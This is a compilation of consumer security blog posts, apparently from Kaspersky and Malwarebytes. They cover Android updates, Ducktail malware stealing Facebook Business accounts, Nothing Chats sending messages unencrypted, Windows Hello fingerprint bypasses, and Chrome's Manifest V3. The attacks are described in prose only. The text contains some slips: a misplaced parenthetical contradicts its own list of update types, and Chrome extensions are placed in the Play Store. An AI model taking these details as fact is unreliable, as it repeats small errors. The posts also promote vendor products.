For many, Android smartphone updates are a sore point. On the one hand, they’re essential to fix dangerous bugs and vulnerabilities on your phone, delivering handy new features and support for the latest technologies at the same time. On the other hand, updates are often delayed, get installed at the worst possible time, they can slow down your phone, and in really bad cases cause data loss or even brick the device.

Let’s figure out how to install Android updates properly to get all the benefits and zero misery.

Different types of updates

“Installing updates” can refer to five quite different scenarios depending on what exactly is being updated.

Updating apps. Individual apps on devices are updated automatically or manually through an app store (Google Play, Huawei AppGallery and the like). Updating one app in this case rarely affects the rest and generally has little effect on the gadget.
Updating Android components. Google developers have long been committed to modularization, so many parts of the operating system (such as the call screen or photo viewer) are essentially separate apps. Some of these likewise download updates through an app store; others (like Google Play Services) are forcibly updated at a lower level.
Updating extensions from the smartphone manufacturer. All that distinguishes a Samsung, Oppo or Xiaomi smartphone from a “pure” Android device are proprietary extensions, which often radically alter the look of the operating system and sport fancy names like OneUI or ColorOS. The internal structure and update method differ from vendor to vendor — many try to time extension updates to coincide with the release of general Android updates, but this isn’t a hard-and-fast rule.
Updating Android itself. Google rolls out major Android updates once a year — upping the major version number by one — but bug fixes and security updates appear monthly. However, most smartphones don’t get the latest version of Android from Google directly: manufacturers of specific models must first add the correct low-level components and vendor-specific extensions, and only then offer the latest version of Android to users. Therefore, for any Android update, the time from rollout to availability on smartphones other than Google Pixel or devices running AOSP (Android Open Source Project) can be anything from a month to… eternity — depending on the manufacturer’s promptness.
Updating low-level components. This means the bootloader, 4G/Wi-Fi chip firmware, drivers and the like. As a rule, these components are updated along with the operating system, but they can get their own updates as and when required. In any case, updates of this type are released only by the company that made your phone.

Updates of the first two types (bootloader, 4G/Wi-Fi chip firmware) arrive either automatically or by pressing literally one button in your chosen app store, and usually take just seconds; others need much longer, require a smartphone restart, and are slightly more prone to side effects. Which means you need to cushion the potential blow.

What could go wrong

Nuisances. On many manufacturers’ devices, alerts about new updates appear in the notification drawer and remain stuck there. Sometimes they go full-screen and demand immediate installation. One mis-tap and your phone is already pulling gigabytes of data – heaven forbid if you’re in roaming mode.

Eating up phone space. Security updates and bug fixes are usually small in scope, but new versions of vendor extensions or Android itself can be significantly larger than their forebears. And this creates a separate problem for budget smartphones with low storage capacity.

Post-update bugs. Even Google makes mistakes. For example, users updating to Android 12 encountered all sorts of issues — from unstable network connection and flickering displays to bricked devices. Similar problems sometimes occur with vendor extensions.

Loss of data or functionality. A rare but most unpleasant occurrence is when, after an update, various apps stop working (if, say, they’re too outdated to receive updates) or user data vanishes.

Why you still need to update

Vulnerabilities. Stories about how smartphones can get infected with malware without any user action or with no signs that anything is wrong are not fiction, but rather the result of the exploitation of dangerous bugs in Android itself and installed apps. Vulnerabilities even crop up in cellular or Wi-Fi modules. And if you think this “spy fiction” doesn’t apply to you, beware — cybercriminals will quite happily use vulnerabilities of this kind to steal your money, passwords and anything else that isn’t bolted down. Each monthly Android update fixes a handful of serious vulnerabilities and a dozen or two low-risk ones.

Bugs. From increased power consumption and memory leaks to camera focus issues, the corresponding bug fixes in low-end components, Android itself, and/or vendor extensions make the smartphone experience more enjoyable.

Compatibility. Even if you don’t like new stuff, sooner or later you have to update the browser, programs, and operating system anyway just to be able to continue using your online apps and even visit certain websites. The support period for older versions of software is steadily dwindling, and, for example, in a severely outdated Chrome, many sites refuse to open properly.

Top tips for hassle-free updating

Use only official sources. Download updates only through your chosen app store or your smartphone’s system settings. Don’t install updates from websites unless the manufacturer offers no other way; in which case, as above, download updates only from said manufacturer’s official site — never from aggregators, news media or unknown sites.

Create backups. Android doesn’t fully back up everything automatically, but you can set up uploading of photos and documents to Google Drive, while your contacts, calendar and various other data are backed up to your Google account, and many apps (for example, WhatsApp) have built-in backup. Set up backup in all apps where possible, so that important information gets saved to the cloud on a nightly basis. If you don’t trust third-party clouds, there are utilities for syncing your phone with a storage server on your home network.

Optimize update downloading. Explore your smartphone settings. If updates are customizable, opt to download them at night, assuming Wi-Fi and power are available. That way, downloading updates won’t interrupt your daytime work, chew through your mobile data, or drain your battery. If there are no such settings, and update notifications often come at a bad time, you can risk turning off notifications or automatic checking for updates. In this case, you must set a regular reminder (say, once a month on a weekend) to check for updates manually through the device settings. It’s best to choose an installation time when you can afford to put your phone down for a while.

Be selective. If it’s not a critical vulnerability fix, you can put off installing it — but not for long, of course; however, waiting a few days to a week should be ok, all the while checking on forums to see if owners of the same smartphone are having issues with the update. If so, that will give time for hundreds of them to voice a complaint, and, if you’re lucky, time also for a patched version to come out.

Get rid of unnecessary stuff. Binning downloaded documents no longer needed, clearing caches, deleting unused apps and moving photos and videos to the cloud helps free up a lot of smartphone memory and reduce the likelihood of update problems. Incidentally, our mobile application for Android comes with a handy junk cleaner tool.

Update apps and firmware separately. To make it easier to track the source of potential issues, don’t update apps and firmware at the same time: after updating the operating system and vendor extensions, wait a few days before installing app updates — again, only if there are no critical vulnerability fixes.

Install Kaspersky: Antivirus & VPN on your Android device. Our application warns and protects you against known vulnerabilities, scans downloaded apps for viruses, fixes dangerous device settings, manages app permissions, blocks dangerous links, and keeps your data safe if ever your phone is lost or stolen.

Kaspersky official blog – ​Read More

How Ducktail steals Facebook accounts | Kaspersky official blog

Our researchers have discovered a new version of malware from the Ducktail family. Cybercriminals are using it to target company employees who either hold fairly senior positions or work in HR, digital marketing, or social-media marketing. Their ultimate goal is to hijack Facebook Business accounts, so it makes sense that the attackers are interested in folks most likely to have access to them. Today, we talk about how attacks occur, what’s unusual about them and, of course, how to protect yourself.

Bait and malicious payload

What the cybercriminals behind Ducktail do is send out malicious archive to their potential victims. To lull the recipient’s vigilance, the archives contain bait in the form of theme-based images and video files on a common topic. For example, the theme of the most recent campaign (March to early October 2023) was fashion: emails were sent out in the name of big fashion industry players with archives containing photos of items of clothing.

However, inside these archives were also executable files. These files had PDF icons and very long file names to divert the victim’s attention from the EXE extension. Additionally, the names of the fake files appeared to be carefully chosen for relevance so as to persuade the recipients to click on them. In the fashion-themed campaign, the names referred to “guidelines and requirements for candidates”, but other bait like, say, price lists or commercial offers, can be used as well.

The malicious Ducktail archive contains a file that looks like a PDF but is in fact an EXE

After clicking the disguised EXE file, a malicious script runs on the target device. Firstly, it does indeed display the contents of some PDF file embedded in the malware code, with the hope that the victim doesn’t smell a rat. At the same time, the malware scans all the shortcuts on the desktop, the Start menu, and the Quick Launch toolbar. It searches for shortcuts to Chromium-based browsers, such as Google Chrome, Microsoft Edge, Vivaldi, Brave… Having found one, the malware alters its command line by adding an instruction to install a browser extension, which is also embedded in the executable file. Five minutes later, the malicious script terminates the browser process, prompting the user to restart it using one of the modified shortcuts.

Malicious browser extension

After the user clicks the shortcut, a malicious extension is installed in the browser, where it convincingly masquerades as Google Docs Offline, using the exact same icon and description (though only in English, which can give away the fake in some regions).

The malicious extension masquerading as Google Docs Offline (left), and the real Google Docs Offline extension (right) in the Google Chrome browser

Once installed and running, the malicious extension starts constantly monitoring all tabs opened by the user in the browser and sending information about them to the attackers’ C2 server. If it finds an address associated with Facebook among the opened tabs, the malicious extension checks for Ads and Business accounts and then hijacks them.

The extension steals information from Facebook accounts logged into on the victim’s device, as well as active session cookies stored by the browser, which can be used to sign in to the accounts without authentication.

The group behind the malware has reportedly been active since 2018. Several research teams believe it has Vietnamese origin. The group’s distribution of Ducktail can be pinpointed to 2021.

How to guard against Ducktail

To protect against Ducktail and similar threats, employees need to simply observe basic digital hygiene; in particular:

Never download suspicious archives on work computers — especially if the links come from untrusted sources.
Carefully check the extensions of all files downloaded from the internet or email before opening them.
Never click on a file that looks like a harmless document but has an EXE extension — this is a clear sign of malware.
Always install reliable protection on all work devices.This will warn you of potential danger and defeat any attacks in time. Our solutions detect this threat with the verdict HEUR:Trojan.Win64.Ducktail.gen.
You can find indicators of compromise as well as more technical details on this malware in the respective Securelist blog post.

Kaspersky official blog – ​Read More

Why Nothing Chats is unsafe | Kaspersky official blog

The Nothing Chats app is a messenger created by the developer of the quite popular smartphone Nothing Phone — yet another “iPhone killer”. The main selling point of Nothing Chats is was the promise of giving Android users the ability to fully communicate using iMessage — a messaging system previously available only to iPhone owners.

However, Nothing Chats was almost immediately found to have a whole host of security and privacy issues. These problems were so serious that less than 24 hours after its release in the Google Play Store, the application had to be removed. Let’s delve into this in more detail.

Nothing Chats, Sunbird, and iMessage for Android

The Nothing Chats messenger was announced on November 14, 2023, in a video by the well-known YouTube blogger Marques Brownlee (aka MKBHD). He talked about how the new messenger from Nothing had plans to allow owners of a Nothing Phone (which is Android-based) to communicate with iOS users through iMessage.

By the way, I recommend watching the video by MKBHD, at least to see how the messenger worked.

The video also briefly outlines how the messenger operates from a technical point of view. To begin, users have to provide Nothing Chats with the login and password to their Apple ID account (and if they don’t have one yet, they need to create one). After this, to indirectly quote the video, “on some Mac mini somewhere on a server farm”, this Apple account is logged in to, after which this remote computer serves as a relay transmitting messages from the user’s smartphone to the iMessage system, and vice versa.

To give credit where credit is due, at the end of the sixth minute, the author of the video makes a point of emphasizing that this approach carries some serious risks. Indeed, logging in with your Apple ID on some unknown device that doesn’t belong to you, located who knows where, is a very, very bad idea for a number of reasons.

The coveted blue message clouds of iMessage — the main promise of Nothing Chats

The Nothing company made no secret of the fact that “iMessage for Android” was not their own development. The company partnered with another company, Sunbird, so the Nothing Chats messenger was a clone of the Sunbird: iMessage for Android application, with some cosmetic interface changes. By the way, the Sunbird app was announced to the press back in December 2022, but its full launch for a wide audience was constantly postponed.

Nothing Chats and security issues

After the announcement, suspicions immediately arose that Nothing and Sunbird would face serious privacy and security issues. As mentioned earlier, the idea of logging in with your Apple ID on someone else’s device is highly risky because this account gives full control over a significant amount of user information and over the devices themselves through the Apple feature Find My…

To reassure users, both Sunbird and Nothing asserted on their websites that logins and passwords aren’t stored anywhere, all messages are protected by end-to-end encryption, and everything is absolutely secure.

Sunbird’s website confirming the security and privacy of iMessage for Android, as well as the use of end-to-end encryption (spoiler: this isn’t true)

However, the reality was way off even the most skeptical predictions. Once the application became available, it quickly became clear that it totally failed to deliver on its promises regarding end-to-end encryption. Worse still, all messages and files sent or received by the user were delivered by Nothing Chats in unencrypted form to two services simultaneously — the Google Firebase database and the Sentry error monitoring service, where Sunbird employees could access these messages.

The FAQ section on the official Nothing Chats page also explicitly mentions end-to-end encryption

And if that still wasn’t enough, not only Sunbird employees but anyone interested could read the messages. The issue was that the token required for authentication in Firebase was transmitted by the application over an unprotected connection (HTTP) and could, therefore, be intercepted. Subsequently, this token provided access to all messages and files of all users of the messenger — as mentioned earlier, all this data was sent to Firebase in plain text.

Once again: despite assurances of using end-to-end encryption, any message from any user on Nothing Chats and all files sent by them — photos, videos, and so on — could be intercepted by anyone.

Also, the FAQ page of Nothing Chats claims that messages are never stored anywhere — doesn’t it make you want to cry?

One of the researchers involved in analyzing the vulnerabilities of Nothing Chats/Sunbird created a simple website as proof of an attack’s feasibility, allowing anyone to see that their messages in iMessage for Android could indeed be easily intercepted.

Shortly after the vulnerabilities were made public, Nothing decided to remove their app from the Google Play Store “to fix a few bugs”. However, even if Nothing Chats or Sunbird: iMessage for Android returns to the store, it’s best to avoid them — as well as any similar apps. This story demonstrates vividly that when creating an intermediary service that allows access to iMessage, it’s very easy to make catastrophic mistakes that put users’ data at extreme risk.

What Nothing Chats users should do now

If you’ve used the Nothing Chats app, you should do the following:

Log into your Apple ID account from a trusted device, find the page with active sessions (devices you’re logged in to), and delete the session associated with Nothing Chats/Sunbird.
Change your Apple ID password. It’s an extremely important account, so it’s advisable to use a very long and random sequence of characters — Kaspersky Password Manager can help you generate a reliable password and store it securely.
Uninstall the Nothing Chats app.
You can then use a tool created by one of the researchers to remove your information from Sunbird’s Firebase database.
If you’ve sent any sensitive information through Nothing Chats, then you should treat it as compromised and take appropriate measures: change passwords, reissue cards, and so on. Kaspersky Premium will help you track possible leaks of your personal data linked to email addresses or phone numbers.

Kaspersky official blog – ​Read More

A week in security (November 20 – November 26)

Last week on Malwarebytes Labs:

Windows Hello fingerprint authentication can be bypassed on popular laptops

Citrix Bleed widely exploitated, warn government agencies

Chrome pushes forward with plans to limit ad blockers in the future

$19 Stanley cup deal is a Black Friday scam

Malwarebytes consumer product roundup: The latest

Explained: Privacy washing

Nothing Chats pulled from Google Play

How to stop fake System notifications on macOS

Why less is more: 10 steps to secure customer data

Atomic Stealer distributed to Mac users via fake browser updates

Scattered Spider ransomware gang falls under government agency scrutiny

Student discount: Get 50% off Malwarebytes

Stay safe!

Our business solutions remove all remnants of ransomware and prevent you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

Malwarebytes – ​Read More

Windows Hello fingerprint authentication can be bypassed on popular laptops

Researchers have found several weaknesses in Windows Hello fingerprint authentication on Dell Inspiron 15, Lenovo ThinkPad T14, and Microsoft Surface Pro X laptops.

Microsoft’s Offensive Research and Security Engineering (MORSE) asked the researchers to evaluate the security of the top three fingerprint sensors embedded in laptops. They found vulnerabilities that allowed them to completely bypass Windows Hello authentication on all three.

If you like to read the full technical details, we happily refer you to the Blackwing researcher’s blog: A TOUCH OF PWN – PART I. For a less technical summary, carry on.

First but foremost, it’s important to know that for these vulnerabilities to be exploitable, fingerprint authentication needs to be set up on the target laptop. Imagine the type of disaster if that wasn’t true.

The three sensors the researchers looked at were all of the “match on chip” type. This means that a separate chip stores the biometric credentials (in this case the fingerprints), making it almost impossible to hack into.

The communication between the sensor and the laptop is done over a secure channel, set up through the Secure Device Connection Protocol (SDCP) created by Microsoft.

SDCP aims to answer three questions about the sensor:

How can the laptop be certain it’s talking to a trusted sensor and not a malicious one?

How can the lapop be certain the sensor hasn’t been compromised?

How is the raw input from the sensor protected?

The input has to be authenticated.

The input is fresh and can’t be re-playable.

So, what could go wrong?

The researchers were still able to spoof the communication between sensor and laptops. They were able to fool the the laptops using a USB device which pretended to be its sensor, and sent a signal that an authorized user had logged in.

The bypasses are possible because the device manufacturers did not use SDCP to its full potential:

The ELAN sensor commonly used in Dell and Microsoft Surface laptops lacks SDCP support and transmits security identifiers in cleartext.

Synaptics sensors, used by both Lenovo and Dell, had turned SDCP off by default and used a flawed custom Transport Layer Security (TLS) stack to secure USB communications.

The Goodix sensors, also used by both Lenovo and Dell, could be bypassed because they are suitable for Windows and Linux, which does not support SDCP. The host driver sends an unauthenticated configuration packet to the sensor to specify what database to use during sensor initialization.

The recommendation of the researchers to the manufacturers is clear: SDCP is a powerful protocol, but it doesn’t help if it isn’t enabled or when it can be bypassed by using other weak links in your setup.

The fact that three manufacturers were mentioned by name doesn’t mean by any stretch that others have done a better job. It just means the researchers didn’t get round to testing them.

If you, as a user, are worried about anyone being able to get near your laptop with a USB device, you shouldn’t be using fingerprints as an authentication method and disabled.

Type and search [Sign-in options] in the Windows search bar, then click [Open].

Select [Fingerprint recognition (Windows Hello), then click [Remove], and the fingerprint sign-in option will be removed.

Until the manufacturers have dealt with the weaknesses in their setups, we can’t assume that this is a secure method of authentication.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Malwarebytes – ​Read More

Chrome pushes forward with plans to limit ad blockers in the future

Google has announced it will shut down Manifest V2 in June 2024 and move on to Manifest V3, the latest version of its Chrome extension specification that has faced criticism for putting limits on ad blockers. Roughly said, Manifest V2 and V3 are the rules that browser extension developers have to follow if they want their extensions to get accepted into the Google Play Store.

Manifest V2 is the old model. The Chrome Web Store no longer accepts Manifest V2 extensions, but browsers can still use them. For now. Manifest V3 is supported generally in Chrome 88 or later and will be the standard after the transition planned to take place in June 2024.

A popular type of browser extensions are ad blockers. Almost all these ad blockers work with block lists, which are long lists of domains, subdomains, and IP addresses that they filter out of your web traffic. These lists are commonly referred to as rulesets. One part of the transition will “improve” content filtering. And to be fair, Google has made some compromises when it comes to the version as it’s now in the planning, compared to what it originally planned to do.

Originally, each extension could offer users a choice of 50 static rulesets, and 10 of these rulesets could be enabled simultaneously. This changes to 50 extensions simultaneously and 100 in total.

Extensions could add up to 5,000 rules dynamically which encouraged using this functionality sparingly and made it easier for Google to detect abuse. Extensions can add rules dynamically to support more frequent updates and user-defined rules. But it comes with the risks of phishing or data theft because these “updates” are not checked during the Chrome Web Store review. For example, a redirect rule could be abused to inject affiliate links without consent. But Google has decided that block and allow are not that easily abused so it will allow up to 30,000 rules to be added dynamically.

However, this is still far from enough to fully reach the potential of the best ad blockers we have now. And it’s not just the hard limits on filtering rulesets, there are a lot of other new limits on filtering. Items can’t be filtered based on the response headers or according to the URL in the address bar. Also, extension developers are limited in what regular expressions they can use, along with other technical limitations.

Even if this is not targeted at ad blockers specifically, it’s still a major change that makes blocking requests less flexible. But the bottom line result is that it limits the API that many ad blockers use, and replace it with a less capable one.

Google’s will tell you that by limiting extensions, the browser can be lighter on resources, and Google can protect your privacy from extension developers and calls it “a step in the direction of privacy, security, and performance.” The Electronic Frontier Foundation (EFF) however calls Manifest V3 deceitful and threatening.

“Manifest V3 is another example of the inherent conflict of interest that comes from Google controlling both the dominant web browser and one of the largest internet advertising networks.”

Under the new specifications, browser extensions that monitor and filter the web traffic between the browser and the website will have greatly reduced capabilities. This includes ad blockers and privacy-protective tracker blockers. No real surprise, considering Google has trackers installed on 75% of the top one million websites.

According to Firefox’s Add-on Operations Manager, most malicious extension that manage to get through the security review process, are usually interested in simply observing the conversation between your browser and whatever websites you visit. The malicious activity happens elsewhere, after the data has already been read. So in their mind, what would really help security is a more thorough review process, but that’s not something Google says it has plans for.

After looking at the arguments Google used to justify this transition, ArsTechnica came to the conclusion that there’s no justification for arbitrarily limiting the list of filter rules. It says once Manifest V3 happens, Chrome users will be limited to light ad blocker functionality while users will need to switch to Firefox or some other non-limited browser to get the full extension.

Nevertheless, Firefox said it will adopt Manifest V3 in the interest of cross-browser compatibility. And Chrome’s market share will certainly have influenced that decision as well.

Google Chrome Enterprise users with the “ExtensionManifestV2Availability” policy turned on will get an extra year of Manifest V2 compatibility.

If you want to help Malwarebytes get ready for the transition, you can test the beta version of Browser Guard for Manifest V3.

We don’t just report on privacy—we offer you the option to use it.

Privacy risks should never spread beyond a headline. Keep your online privacy yours by using Malwarebytes Privacy VPN.

Black Friday sale

Save 50% on our Home bundles for a limited time only!

Malwarebytes – ​Read More